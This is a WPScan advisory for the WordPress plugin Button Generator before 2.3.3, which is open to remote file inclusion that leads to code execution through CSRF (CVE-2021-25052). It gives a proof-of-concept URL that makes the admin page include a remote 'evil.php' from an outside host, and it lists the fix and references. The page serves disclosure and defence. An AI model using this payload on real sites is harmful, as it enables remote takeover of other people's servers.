WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Button Generator < 2.3.3 - RFI leading to RCE via CSRF

Description

The plugin within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.

Proof of Concept

http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F

PHP's allow_url_include must be set to "On"

Affects Plugins

button-generation
Fixed in version 2.3.3

References

CVE
CVE-2021-25052
URL
https://plugins.trac.wordpress.org/changeset/2641639/button-generation

Classification

Type

RCE

OWASP top 10
A1: Injection
CWE
CWE-94

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
a01844a0-0c43-4d96-b738-57fe5bfbd67a

Timeline

Publicly Published

2021-12-05 (about 9 months ago)

Added

2021-12-09 (about 9 months ago)

Last Updated

2022-04-11 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin